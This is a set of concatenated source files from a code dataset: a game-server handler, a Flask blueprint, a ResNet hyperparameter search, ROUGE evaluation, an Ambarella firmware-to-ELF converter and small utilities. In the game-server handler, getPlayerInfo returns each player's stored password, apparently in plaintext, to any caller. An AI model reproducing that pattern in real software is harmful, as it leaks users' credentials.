playerDBchd.buying_equipment_mouth = int_buying_equipment_mouth\n                \n                buying_equipment_fin = self.request.get('buying_equipment_fin')\n                int_buying_equipment_fin = int(buying_equipment_fin)\n                if(int_buying_equipment_fin != -1):\n                    playerDBchd.buying_equipment_fin = int_buying_equipment_fin\n                \n                hp_lv = self.request.get('hp_lv')\n                int_hp_lv = int(hp_lv)\n                if(int_hp_lv != -1):\n                    playerDBchd.hp_lv = int_hp_lv\n                \n                #scale_lv = self.request.get('scale_lv')\n                #int_scale_lv = int(scale_lv)\n                #if(int_scale_lv != -1):\n                #    playerDBchd.scale_lv = int_scale_lv\n                \n                speed_lv = self.request.get('speed_lv')\n                int_speed_lv = int(speed_lv)\n                if(int_speed_lv != -1):\n                    playerDBchd.speed_lv = int_speed_lv\n                \n                fever_lv = self.request.get('fever_lv')\n                int_fever_lv = int(fever_lv)\n                if(int_fever_lv != -1):\n                    playerDBchd.fever_lv = int_fever_lv\n                \n                nick_name = self.request.get('nick_name')\n                if(nick_name != 'null'):\n                    playerDBchd.nick_name = nick_name\n                \n                exp_lv = self.request.get('exp_lv')\n                int_exp_lv = int(exp_lv)\n                if(int_exp_lv != -1):\n                    playerDBchd.exp_lv = int_exp_lv\n                \n                exp_sub = self.request.get('exp_sub')\n                int_exp_sub = int(exp_sub)\n                if(int_exp_sub != -1):\n                    playerDBchd.exp_sub = int_exp_sub\n                \n                playerDBchd.put()\n                break\n            self.response.write('ok')\n        else:\n            self.response.write('fail : ID not Existed')\n        \n    def getRankingList(self):\n        isExistID = self.isExistedID()\n        if(isExistID == True):\n            id = self.request.get('id')    \n            qry = PlayerDB.query(ancestor=ndb.Key('Group', 'Profile'))\n            qry = qry.filter(PlayerDB.id == id)\n            playerDBs = qry.fetch(1)\n            playerScore = 0\n            for playerDBchd in playerDBs:\n                playerScore = playerDBchd.score\n                break\n            \n            listCount = self.request.get('count')\n            int_listCount = int(listCount)\n            qry = PlayerDB.query(ancestor=ndb.Key('Group', 'Profile'))\n            qry = qry.filter(PlayerDB.score >= playerScore).order(-PlayerDB.score)\n            playerDBs = qry.fetch()\n            counter = 1\n            playerRanking = 0\n            \n            self.response.write('\\n')\n            self.response.write('\\n')\n            for playerDBchd in playerDBs:\n                if(counter <= int_listCount):\n                    self.response.write('%d %s %d\\n' % (counter, playerDBchd.id, playerDBchd.score))\n                if(playerScore == playerDBchd.score):\n                    playerRanking = counter\n                counter += 1\n            if(counter-1 < int_listCount):\n                restCount = int_listCount - counter + 1\n                qry = PlayerDB.query(ancestor=ndb.Key('Group', 'Profile'))\n                qry = qry.filter(PlayerDB.score < playerScore).order(-PlayerDB.score)\n                playerDBs = qry.fetch(restCount)\n                for playerDBchd in playerDBs:\n                    self.response.write('%d %s %d\\n' % (counter, playerDBchd.id, playerDBchd.score))\n                    counter += 1\n            self.response.write('%d %s %d\\n' % (playerRanking, id, playerScore))\n            self.response.write('\\n')\n        else:\n            self.response.write('\\n')\n            self.response.write('\\n')\n            self.response.write('\\n')\n\n    def getPlayerInfo(self):\n        isExistID = self.isExistedID()\n        if(isExistID == True):\n            id = self.request.get('id')    \n            qry = PlayerDB.query(ancestor=ndb.Key('Group', 'Profile'))\n            qry = qry.filter(PlayerDB.id == id)\n            playerDBs = qry.fetch(1)\n            self.response.write('\\n')\n            self.response.write('\\n')\n            for playerDBchd in playerDBs:\n                self.response.write('%s %s %d %d %d %d %d %d %d %d %d %d %d %d %s %d %d\\n' % (playerDBchd.id, playerDBchd.password, playerDBchd.score, playerDBchd.soft_cash, playerDBchd.hard_cash, playerDBchd.equipment, playerDBchd.item, playerDBchd.buying_equipment_eye, playerDBchd.buying_equipment_body, playerDBchd.buying_equipment_mouth, playerDBchd.buying_equipment_fin, playerDBchd.hp_lv, playerDBchd.speed_lv, playerDBchd.fever_lv, playerDBchd.nick_name, playerDBchd.exp_lv, playerDBchd.exp_sub))\n                break\n            
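# a player id maps to at most one record, hence the break above\n            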
self.response.write('\\n')\n        else:\n            self.response.write('\\n')\n            self.response.write('\\n')\n            self.response.write('\\n')\n\n    def post(self):\n        action = self.request.get('action')\n        if(action == 'login'):\n            self.login()\n        elif(action == 'create'):\n            self.create()\n        elif(action == 'update'):\n            self.update()\n        elif(action == 'getRankingList'):\n            self.getRankingList()\n        elif(action == 'getPlayerInfo'):\n            self.getPlayerInfo()\n    \napplication = webapp2.WSGIApplication([\n    ('/', MainPage),\n], debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"269898269","text":"from flask import Blueprint\nfrom user.user_helpers import get_user_by_id\n\nuser = Blueprint(\"user\", __name__)\n\n\n@user.route(\"/<int:user_id>\")\ndef user_info(user_id):\n    user = get_user_by_id(user_id)\n\n    if user:\n        return {\n            \"error\": False,\n            \"message\": \"User Found!\",\n            \"payload\": {\n                \"user\": {\"id\": user[\"id\"], \"name\": user[\"name\"], \"email\": user[\"email\"]}\n            },\n        }\n    else:\n        return {\"error\": True, \"message\": \"User Not Found!\"}\n\n","sub_path":"submissions/sm_001_aalind/week_19/day_4/session_1/backend/user/blueprint_user.py","file_name":"blueprint_user.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"186612255","text":"import tensorflow as tf\n\nfrom hyperopt import fmin, tpe, hp, STATUS_OK, Trials\nfrom hyperopt import hp\n\nfrom residual_block import stack_block\n\nimport csv, pickle, traceback\n\nfrom sklearn.metrics import accuracy_score\n\ntrain_directory = \"../dataset_normalized/training_set\"\ntest_directory = \"../dataset_normalized/validation_set\"\n\ntrain_gen = tf.keras.preprocessing.image_dataset_from_directory(\n    train_directory,\n    labels=\"inferred\",\n    label_mode=\"categorical\",\n    batch_size=3,\n    image_size=(355, 370),\n    validation_split=0.2,\n    seed=2222,\n    subset=\"training\",\n)\n\nvalid_gen = tf.keras.preprocessing.image_dataset_from_directory(\n    train_directory,\n    labels=\"inferred\",\n    label_mode=\"categorical\",\n    batch_size=8,\n    image_size=(355, 370),\n    validation_split=0.2,\n    seed=2222,\n    subset=\"validation\",\n)\n\ntest_gen = tf.keras.preprocessing.image_dataset_from_directory(\n    test_directory,\n    labels=\"inferred\",\n    label_mode=\"categorical\",\n    batch_size=8,\n    image_size=(355, 370)\n)\n\ndef pooling_choice(tensor, pooling_type: str):\n\n    if pooling_type == \"glob_avg\":\n        tensor = tf.keras.layers.GlobalAveragePooling2D() (tensor)\n    elif pooling_type == \"glob_max\":\n        tensor = tf.keras.layers.GlobalMaxPooling2D() (tensor)\n    elif pooling_type == \"avg\":\n        tensor = tf.keras.layers.AveragePooling2D() (tensor)\n    elif pooling_type == \"max\":\n        tensor = tf.keras.layers.MaxPooling2D() (tensor)\n    \n    tensor = tf.keras.layers.Flatten() (tensor)\n    return tensor\n\ndef dense_choice(tensor, qtd_dense: int, filters: list, activation: str, dropout_value: float):\n    for i in range(qtd_dense):\n        tensor = tf.keras.layers.Dense(filters[i], activation=activation) (tensor)\n        tensor = tf.keras.layers.Dropout(dropout_value) (tensor)\n    \n    return tensor\n\ndef block_change_choice(tensor, qtd_stacks, filters, layers):\n    conv_numbers = 6\n    for i in range(qtd_stacks):\n        tensor = stack_block(tensor, filters[i], layers, name=\"conv{}\".format(conv_numbers+i))\n    \n    return tensor    \n\nparam_space = {\n    \"pooling\": hp.choice('pooling', ['avg', 'max', 'glob_avg', 
'glob_max']),\n    \"optimizer\": hp.choice('optimizer', ['adam', 'rmsprop']),\n    \"loss\": hp.choice('loss', ['categorical_crossentropy']),\n    \"unfreeze\": hp.choice('unfreeze', [0, 10, 15, 20, 30, 40]),\n    \"stacks\": hp.choice('stacks', [\n        {\n            'qtd_stacks': 0, \n            'filters': [],\n            'layers': []\n        },\n        {\n            'qtd_stacks': 1, \n            'filters': hp.choice('filters2', [[1024]]),\n            'layers': hp.choice('layers2', [3, 4, 6, 8, 23, 36])\n        },\n        {\n            'qtd_stacks': 2, \n            'filters': hp.choice('filters3', [[1024, 1024], [1024, 2048]]),\n            'layers': hp.choice('layers3', [3, 4, 6, 8, 23, 36])\n        },\n    ]),\n    \"dense\": hp.choice('dense', [\n        {\n            'qtd_dense': 1,\n            'filters': hp.choice('filters4', [[256], [512], [1024]]),\n            'activation': hp.choice('activation', ['relu', 'elu']),\n            'dropout': hp.choice('dropout', [0.5, 0.6, 0.7])\n        },\n        {\n            'qtd_dense': 2,\n            'filters': hp.choice('filters5', [[256, 256], [256, 512]]),\n            'activation': hp.choice('activation2', ['relu', 'elu']),\n            'dropout': hp.choice('dropout2', [0.5, 0.6, 0.7])\n        },\n        {\n            'qtd_dense': 3,\n            'filters': hp.choice('filters6', [[256, 256, 256], [256, 512, 1024]]),\n            'activation': hp.choice('activation3', ['relu', 'elu']),\n            'dropout': hp.choice('dropout3', [0.5, 0.6, 0.7])\n        },\n        {\n            'qtd_dense': 4,\n            'filters': hp.choice('filters7', [[256, 256, 256, 256], [256, 512, 1024, 2048]]),\n            'activation': hp.choice('activation4', ['relu', 'elu']),\n            'dropout': hp.choice('dropout4', [0.5, 0.6, 0.7])\n        }\n    ])\n}\n\ndef hyperopt_fitness(params: dict):    \n    res_model = tf.keras.applications.ResNet152(include_top=False, weights='imagenet', input_tensor=tf.keras.Input((355, 370, 3)))\n\n    tensor = block_change_choice(res_model.output, params[\"stacks\"][\"qtd_stacks\"], params[\"stacks\"][\"filters\"], params[\"stacks\"][\"layers\"])\n    tensor = pooling_choice(tensor, params[\"pooling\"])\n    tensor = dense_choice(tensor, params[\"dense\"][\"qtd_dense\"], params[\"dense\"][\"filters\"], params[\"dense\"][\"activation\"], params[\"dense\"][\"dropout\"])\n    tensor = tf.keras.layers.Dense(5, activation=\"softmax\") (tensor)\n\n    model = tf.keras.Model(inputs=res_model.input, outputs=tensor)\n\n    for layer in res_model.layers[params[\"unfreeze\"]:]:\n        layer.trainable = False\n    \n    model.compile(optimizer=params[\"optimizer\"], loss=params[\"loss\"], metrics=['accuracy'])\n\n    # steps must be integers, hence the floor division\n    train_steps = 6177 // 3\n    valid_steps = 1544 // 8\n    # test_steps = 856 // 8\n\n    model.fit(train_gen, epochs=30, steps_per_epoch=train_steps, validation_data=valid_gen, validation_steps=valid_steps, verbose=2, callbacks=[tf.keras.callbacks.EarlyStopping(patience=3)])\n    \n    _, acc = model.evaluate(test_gen, verbose=2)\n\n    results = {\n        'loss': 1-acc,\n        'accuracy': acc,\n        'space': params,\n        'status': STATUS_OK\n    }\n\n    del model\n    tf.keras.backend.clear_session()\n    \n    save_result(results)\n    return results\n\ndef save_result(resultado):\n    with open('resultados_resnet.csv','a', newline='') as results:\n        writer = csv.writer(results) \n        writer.writerow([resultado['accuracy'], resultado['loss'], resultado['space']])\n\ndef run_a_trial():\n    try:\n        trials = pickle.load(open(\"otimizacao_resnet.pkl\", \"rb\"))\n        print(\"Found a previously saved optimization! Loading...\")\n        max_evals = len(trials.trials) + 1\n        print(\"Resuming from iteration {}.\".format(\n            len(trials.trials)))\n    except:\n        trials = Trials()\n        max_evals = 1\n        print(\"Starting from scratch.\")\n\n    best = fmin(hyperopt_fitness, \n                param_space,\n                algo=tpe.suggest, \n                max_evals=max_evals, \n                trials=trials)\n    \n    pickle.dump(trials, open(\"otimizacao_resnet.pkl\", \"wb\"))\n\nwhile True:\n    try:\n        run_a_trial()\n    except Exception as err:\n        err_str = str(err)\n        print(err_str)\n        traceback_str = str(traceback.format_exc())\n        print(traceback_str)","sub_path":"resnet/hyperopt.py","file_name":"hyperopt.py","file_ext":"py","file_size_in_byte":6371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"284652323","text":"#!/usr/bin/env python3\n\nimport os\nfrom pyrouge import Rouge155\n\ndef remove_broken_files():\n    error_id = []\n    for f in os.listdir('outputs/ref'):\n        try:\n            open('outputs/ref/' + f).read()\n        except:\n            error_id.append(f)\n    for f in os.listdir('outputs/hyp'):\n        try:\n            open('outputs/hyp/' + f).read()\n        except:\n            error_id.append(f)\n    error_set = set(error_id)\n    for f in error_set:\n        os.remove('outputs/ref/' + f)\n        os.remove('outputs/hyp/' + f)\n\ndef rouge():\n    r = Rouge155()\n    r.home_dir = '.'\n    r.system_dir = 'outputs/hyp'\n    r.model_dir = 'outputs/ref'\n\n    r.system_filename_pattern = '(\\d+).txt'\n    r.model_filename_pattern = '#ID#.txt'\n    \n    # command_75 = '-e pyrouge/tools/ROUGE-1.5.5/data -a -c 95 -m -n 2 -b 75'\n    command_275 = '-e /home/vbee/tiennv/basicsum/pyrouge/tools/ROUGE-1.5.5/data -a -c 95 -m -n 2 -b 275'\n    # command = '-e pyrouge/tools/ROUGE-1.5.5/data -a -c 95 -m -n 2'\n    # output_75 = r.convert_and_evaluate(rouge_args=command_75)\n    # output_275 = r.convert_and_evaluate(rouge_args=command_275)\n    output = r.convert_and_evaluate(rouge_args=command_275)\n    #output = r.convert_and_evaluate()\n    # print(output)\n    print(\"working\")\n    # output_dict_75 = r.output_to_dict(output_75)\n    # output_dict_275 = r.output_to_dict(output_275)\n    output_dict = r.output_to_dict(output)\n    # print(output_dict_75)\n    # print(output_dict_275)\n    print(output_dict)\n\nif __name__ == '__main__':\n    remove_broken_files()\n    rouge()\n","sub_path":"eval_275.py","file_name":"eval_275.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"603791157","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\" Ambarella Firmware SYS partition to ELF converter\n\n    Converts \"System Software\" partition from Ambarella a7/a9 firmware\n    from a binary image form into ELF format. 
The ELF format can then be\n    easily disassembled, as most tools can read ELF files.\n\n    The Ambarella SDK contains an example system application, on which\n    most products that use an Ambarella SoC base their software.\n    The application is linked and prepared like this:\n```\n    /usr/bin/arm-none-eabi-ld \\\n    -EL -p --no-undefined --gc-sections --no-wchar-size-warning \\\n    -nostdlib -nodefaultlibs -nostartfiles \\\n    -L/usr/lib/arm-none-eabi/lib/armv7-ar/thumb/fpu \\\n    -L/usr/lib/gcc/arm-none-eabi/4.9.3/armv7-ar/thumb/fpu \\\n    -o out/amba_app.elf -T ../output/app/amba_app.lds \\\n    --start-group --whole-archive \\\n    ../output/lib/libapp.a \\\n    ../output/lib/libapplib.a \\\n    ../vendors/ambarella/lib/libaudio.a \\\n    ../vendors/ambarella/lib/libaudio_sys.a \\\n    ../output/lib/libbsp.a \\\n    [...]\n    ../vendors/ambarella/lib/libthreadx.a \\\n    ../vendors/ambarella/lib/libusb.a \\\n    --no-whole-archive -lc -lnosys -lm -lgcc -lrdimon -lstdc++ \\\n    --end-group \\\n    app/AmbaVer_LinkInfo.o\n\n    /usr/bin/arm-none-eabi-nm -n -l out/amba_app.elf\n\n    /usr/bin/arm-none-eabi-objcopy -O binary out/amba_app.elf out/amba_app.bin\n```\n    Note that the last command converts a linked ELF file into a binary memory\n    image. The purpose of this tool is to revert that last operation, which makes\n    it a lot easier to use tools like objdump or IDA Pro.\n\n    The script uses an ELF template, which was prepared from an example Ambarella SDK\n    application by the command (mock_sect.bin is a random file of 32 bytes):\n```\n    echo \"MockDataToUpdateUsingObjcopy\" > mock_sect.bin\n    /usr/bin/arm-none-eabi-objcopy \\\n    --remove-section \".comment\" \\\n    --update-section \".text=mock_sect.bin\" --change-section-address \".text=0xa0001000\" \\\n    --change-section-address \".ARM.exidx=0xa0001020\" \\\n    --update-section \".dsp_buf=mock_sect.bin\" --change-section-address \".dsp_buf=0xa0001020\" \\\n    --update-section \".data=mock_sect.bin\" --change-section-address \".data=0xa0001040\" \\\n    --change-section-address \"no_init=0xa0001060\" \\\n    --change-section-address \".bss.noinit=0xa0004000\" \\\n    --change-section-address \".bss=0xa03a8000\" \\\n    amba_app.elf amba_sys2elf_template.elf\n```\n\n    This tool really uses arm_bin2elf to do the work; it just sets optimal\n    initial parameters for the Ambarella A9 firmware input.\n\n\"\"\"\n\nfrom __future__ import print_function\nimport sys\nimport getopt\nimport os\nimport re\nimport configparser\nimport itertools\n\nsys.path.insert(0, './')\nfrom arm_bin2elf import eprint, ProgOptions, armfw_bin2elf\n\ndef syssw_read_base_address(po):\n    mem_addr = 0\n    # Do not use basename - the a9h file is in the same folder as the a9s\n    fname = \"{:s}.a9h\".format(os.path.splitext(po.fwpartfile)[0])\n    if (po.verbose > 1):\n        print(\"{}: Opening {:s}\".format(po.fwpartfile,fname))\n    parser = configparser.ConfigParser()\n    with open(fname, \"r\") as lines:\n        lines = itertools.chain((\"[asection]\",), lines)    # This line adds a section header to the ini\n        parser.read_file(lines)\n    mem_addr = int(parser.get(\"asection\", \"mem_addr\"),16)\n    del parser\n    return mem_addr\n\ndef main(argv):\n    \"\"\" Main executable function.\n\n    Its task is to parse command line options and call a function which performs the selected command.\n    \"\"\"\n    po = ProgOptions()\n    # Set optimal options for Ambarella A9 ARM firmware\n    po.elftemplate='amba_sys2elf_template.elf'\n    po.inifile = '' # What distinguishes an Ambarella BIN from other BINs is the INI file with the base address inside\n    po.address_base=0x1000000\n    po.address_space_len=0x2000000 # 32MB\n    
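# example invocation (hypothetical file names): amba_sys2elf.py -e -vv -p fw_sys_part.a9s\n    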
po.expect_func_align = 4 # Full length instructions are used in Cortex A9 binary\n    po.expect_sect_align = 0x20 # This is how sections are aligned in Ambarella SDK\n    # Parse command line options\n    try:\n        opts, args = getopt.getopt(argv,\"hevt:p:l:b:s:o:\",[\"help\",\"version\",\"mkelf\",\"dry-run\",\"fwpart=\",\"template\",\"addrsplen=\",\"baseaddr=\",\"section=\",\"output=\"])\n    except getopt.GetoptError:\n        print(\"Unrecognized options; check amba_sys2elf.py --help\")\n        sys.exit(2)\n    for opt, arg in opts:\n        if opt in (\"-h\", \"--help\"):\n            print(\"Ambarella Firmware SYS partition to ELF converter\")\n            print(\"amba_sys2elf.py <-e> [-v] -p <file> [-o <file>] [-t <file>]\")\n            print(\"  -p <file> - name of the firmware binary file\")\n            print(\"  -o <file> - output file name\")\n            print(\"  -t <file> - template file name\")\n            print(\"  -e - make ELF file from a binary image\")\n            print(\"  -l <num> - set address space length; influences size of last section\")\n            print(\"  -b <addr> - set base address; first section will start at this memory location\")\n            print(\"  -v - increases verbosity level; max level is set by -vvv\")\n            sys.exit()\n        elif opt == \"--version\":\n            print(\"amba_sys2elf.py version 0.2.0\")\n            sys.exit()\n        elif opt == \"-v\":\n            po.verbose += 1\n        elif opt == \"--dry-run\":\n            po.dry_run = True\n        elif opt in (\"-p\", \"--fwpart\"):\n            po.fwpartfile = arg\n        elif opt in (\"-o\", \"--output\"):\n            po.outfile = arg\n        elif opt in (\"-t\", \"--template\"):\n            po.elftemplate = arg\n        elif opt in (\"-l\", \"--addrsplen\"):\n            po.address_space_len = int(arg,0)\n        elif opt in (\"-b\", \"--baseaddr\"):\n            po.address_base = int(arg,0)\n        elif opt in (\"-s\", \"--section\"):\n            arg_m = re.search('(?P<name>[0-9A-Za-z._-]+)(@(?P<pos>[Xx0-9A-Fa-f]+))?(:(?P<len>[Xx0-9A-Fa-f]+))?', arg)\n            # Convert to integer, detect base from prefix\n            if arg_m.group(\"pos\") is not None:\n                po.section_pos[arg_m.group(\"name\")] = int(arg_m.group(\"pos\"),0)\n            if arg_m.group(\"len\") is not None:\n                po.section_size[arg_m.group(\"name\")] = int(arg_m.group(\"len\"),0)\n        elif opt in (\"-e\", \"--mkelf\"):\n            po.command = 'e'\n    po.basename = os.path.splitext(os.path.basename(po.fwpartfile))[0]\n    if len(po.fwpartfile) > 0 and len(po.inifile) == 0:\n        po.inifile = po.basename + \".a9h\"\n    if len(po.fwpartfile) > 0 and len(po.outfile) == 0:\n        po.outfile = po.basename + \".elf\"\n    if (po.command == 'e'):\n\n        if (po.verbose > 0):\n            print(\"{}: Opening for conversion to ELF\".format(po.fwpartfile))\n        # read base address from INI file which should be there after AMBA extraction\n        po.address_base = syssw_read_base_address(po)\n        fwpartfile = open(po.fwpartfile, \"rb\")\n\n        armfw_bin2elf(po,fwpartfile)\n\n        fwpartfile.close()\n\n    else:\n\n        raise NotImplementedError('Unsupported command.')\n\nif __name__ == \"__main__\":\n    main(sys.argv[1:])\n","sub_path":"amba_sys2elf.py","file_name":"amba_sys2elf.py","file_ext":"py","file_size_in_byte":6680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"337199832","text":"import sys\ndef main():\n    log = []\n    # for line in sys.stdin:\n    logfile = open('/Users/hgoscenski/Desktop/doorman.2.in', 'r')\n    for line in logfile:\n        log.append(line)\n    men = 0\n    women = 0\n    maxdiff = int(log[0])\n    \nmain()\n","sub_path":"doorman.py","file_name":"doorman.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"635067226","text":"import numpy as np\nimport math\nimport Box2D\nfrom Box2D.b2 import (fixtureDef, polygonShape, )\nfrom utils import UserData, 
COLOR_BLACK\n\nSIZE = 0.001\nBULLET_BOX = [(0,0),(2,-0.08),(2,0.08)]\nRADIUS_START = 0.9\n\n\nclass Projectile:\n def __init__(self, world):\n self.__world = world\n self.__projectile = {}\n self.__ctr = 1\n self.__fixture_bullet = [fixtureDef(\n shape=polygonShape(vertices=BULLET_BOX),\n categoryBits=0x02,\n maskBits=0xFD,\n density=1e-6\n )]\n\n def shoot(self, robot, init_angle, init_pos):\n angle = init_angle\n x, y = init_pos\n x += math.cos(angle) * RADIUS_START\n y += math.sin(angle) * RADIUS_START\n userData = UserData(\"bullet\", self.__ctr)\n self.__fixture_bullet[0].userData = userData\n projectile = self.__world.CreateDynamicBody(\n position=(x, y),\n angle=angle,\n fixtures=self.__fixture_bullet,\n )\n #bullet.bullet = True\n if robot.robot_id == 0:\n # projectile.color = (0.5,0.8,0.4) #green\n projectile.color = (0.9, 0.5, 0.4)\n if robot.robot_id == 1:\n #projectile.color = (0.5,0.8,0.4)\n projectile.color = (0.5, 0.7, 0.9)\n #bullet.userData = userData\n projectile.linearVelocity = (math.cos(angle)*5, math.sin(angle)*5)\n self.__projectile[self.__ctr] = projectile\n self.__ctr += 1\n\n def draw(self, viewer):\n for obj in self.__projectile.values():\n for f in obj.fixtures:\n trans = f.body.transform\n path = [trans*v for v in f.shape.vertices]\n viewer.draw_polygon(path, color=obj.color)\n\n def destroyById(self, bullet_id):\n body = self.__projectile.pop(bullet_id, None)\n if body is not None:\n self.__world.DestroyBody(body)\n\n def destroy(self):\n for bullet in self.__projectile.values():\n self.__world.DestroyBody(bullet)\n self.__projectile = {}\n","sub_path":"first-edition/battlefield/body/projectile.py","file_name":"projectile.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"287689696","text":"from django.urls import path, re_path\nfrom . 
import views\nfrom .views import MyClubListView, MyClubDetailView, MyClubUpdateEvent, MyClubDeleteEvent, \\\n    MyClubCreateEvent, Event_view\n\nurlpatterns = [\n    path('', views.index, name='index'),\n    path('add_venue/', views.add_venue, name='add-venue'),\n    #path('events/', views.all_events, name='show-event'),\n    path('getsubs/', views.list_subscribers, name='list-subscribers'),\n    path('events_view/', Event_view.as_view()),\n    path('allevents/', views.all_events, name='all-events'),\n    path('event/<int:pk>', MyClubDetailView.as_view(), name='event-detail'),\n    path('events/', MyClubListView.as_view(), name='show-events'),\n    path('event/add/', MyClubCreateEvent.as_view(), name='add-event'),\n    path('event/update/<int:pk>', MyClubUpdateEvent.as_view(), name='update-event'),\n    path('event/delete/<int:pk>', MyClubDeleteEvent.as_view(), name='delete-event'),\n    re_path(r'^(?P<year>[0-9]{4})/(?P<month>0?[1-9]|1[0-2])/', views.index, name='index'),\n    ]\n","sub_path":"events/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"615374962","text":"import os\nfrom conans.util.files import save, load\nfrom conans.paths import StorePaths\nfrom conans.model.settings import Settings\nfrom conans.client.conf import ConanClientConfigParser, default_client_conf, default_settings_yml\nfrom conans.model.values import Values\nfrom conans.client.detect import detect_defaults_settings\nfrom conans.client.short_paths_conf import ShortPathsReferences\n\nCONAN_CONF = 'conan.conf'\nCONAN_SETTINGS = \"settings.yml\"\nLOCALDB = \".conan.db\"\nREGISTRY = \"registry.txt\"\n\n\nclass ConanPaths(StorePaths):\n    \"\"\" Class to represent/store/compute all the paths involved in the execution\n    of conans commands\n    \"\"\"\n    def __init__(self, base_folder, store_folder, output):\n        self.conan_folder = os.path.join(base_folder, \".conan\")\n        self._conan_config = None\n        self._settings = None\n        self._output = output\n        self._store_folder = store_folder or self.conan_config.storage_path or self.conan_folder\n        self._short_paths_refs = None\n        StorePaths.__init__(self, self._store_folder, self.short_paths_refs)\n\n    @property\n    def short_paths_refs(self):\n        if self._short_paths_refs is None:\n            self._short_paths_refs = ShortPathsReferences(self.conan_folder)\n        return self._short_paths_refs\n\n    @property\n    def registry(self):\n        return os.path.join(self.conan_folder, REGISTRY)\n\n    @property\n    def conan_config(self):\n        def generate_default_config_file():\n            default_settings = detect_defaults_settings(self._output)\n            default_setting_values = Values.from_list(default_settings)\n            client_conf = default_client_conf + default_setting_values.dumps()\n            save(self.conan_conf_path, client_conf)\n\n        if not self._conan_config:\n            if not os.path.exists(self.conan_conf_path):\n                generate_default_config_file()\n\n            self._conan_config = ConanClientConfigParser(self.conan_conf_path)\n\n        return self._conan_config\n\n    @property\n    def localdb(self):\n        return os.path.join(self.conan_folder, LOCALDB)\n\n    @property\n    def conan_conf_path(self):\n        return os.path.join(self.conan_folder, CONAN_CONF)\n\n    @property\n    def settings_path(self):\n        return os.path.join(self.conan_folder, CONAN_SETTINGS)\n\n    @property\n    def settings(self):\n        \"\"\"Returns {setting: [value, ...]} defining all the possible\n           settings and their values\"\"\"\n        if not self._settings:\n            if not os.path.exists(self.settings_path):\n                save(self.settings_path, default_settings_yml)\n                settings = 
Settings.loads(default_settings_yml)\n            else:\n                content = load(self.settings_path)\n                settings = Settings.loads(content)\n            settings.values = self.conan_config.settings_defaults\n            self._settings = settings\n        return self._settings\n","sub_path":"conans/client/paths.py","file_name":"paths.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"276079168","text":"class Solution:\n    def twoSum(self, nums: list, target: int) -> list:\n        for i in range(len(nums) - 1):\n            a = nums[i]\n            for j in range(i + 1, len(nums)):\n                if nums[j] == target - a:\n                    return [i, j]\n\n    def twoSum2(self, nums: list, target: int) -> list:\n        mp = {}\n        for index, value in enumerate(nums):\n            if target - value in mp.keys():\n                return [mp[target - value], index]\n            mp[value] = index\n        return []\n\n\ns = Solution()\nx = s.twoSum([3, 2, 4], 6)\ny = s.twoSum2([2, 3, 2, 4], 6)\nprint(x)\nprint(y)\n","sub_path":"leetcode/01_两数之和.py","file_name":"01_两数之和.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"239082864","text":"# -*-coding:utf-8-*-\r\n\r\n'''\r\nMinimum number of arrows to burst balloons:\r\nThere are many spherical balloons in a two-dimensional space. For each balloon, the input gives the start and end x-coordinates of its\r\nhorizontal diameter. Since the balloons are horizontal, the y-coordinate does not matter; the start and end x-coordinates are enough.\r\nThe start coordinate is always smaller than the end coordinate, and there are at most 10^4 balloons in the plane.\r\nAn arrow can be shot vertically along the x-axis from different points. An arrow shot at coordinate x bursts every balloon whose\r\ndiameter start and end coordinates xstart, xend satisfy xstart <= x <= xend. There is no limit on the number of arrows, and once shot\r\nan arrow keeps flying forward indefinitely. We want the minimum number of arrows needed to burst all the balloons.\r\n'''\r\n\r\n'''\r\nApproach:\r\n1. Sort the balloons by xstart in ascending order. Sorting does not move the balloons; it only makes it convenient to start shooting\r\n   from the balloon with the smallest xstart.\r\n2. Pick a shooting spot inside the balloon with the smallest xstart, then walk through the following balloons checking for overlap,\r\n   i.e. whether the current balloon's xend reaches the next balloon's xstart. If it does, the same arrow bursts that balloon too, and\r\n   the best shooting spot becomes the smaller xend of the two balloons. If it does not, another arrow is needed, the shooting spot\r\n   moves to the next balloon, and the comparison repeats.\r\n'''\r\n\r\n\r\nclass Solution(object):\r\n\r\n    def findMinArrowShots(self, points):\r\n        if [] == points:\r\n            return 0\r\n        self.space = sorted(points, key=lambda x: (x[0], x[1]))\r\n        arrow_e = self.space[0][1]\r\n        print(self.space)\r\n        shot = 1\r\n        for i in range(1, len(self.space)):\r\n            ball = self.space[i]\r\n            if ball[0] <= arrow_e:\r\n                arrow_e = min(arrow_e, ball[1])\r\n            else:\r\n                shot += 1\r\n                arrow_e = ball[1]\r\n        return shot\r\n\r\n\r\n# p = [[10,16], [2,8], [1,6], [7,12]]\r\n# p = [[1,2147483647]]\r\n# p = [[3,9],[7,12],[3,8],[6,8],[9,10],[2,9],[0,9],[3,9],[0,6],[2,8]]\r\n# p = [[-1,1],[0,1],[2,3],[1,2]]\r\np = [[9, 12], [1, 10], [4, 11], [8, 12], [3, 9], [6, 9], [6, 7]]\r\nobj = Solution()\r\nprint(obj.findMinArrowShots(p))\r\n","sub_path":"python/finished/algorithm/greed.py","file_name":"greed.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
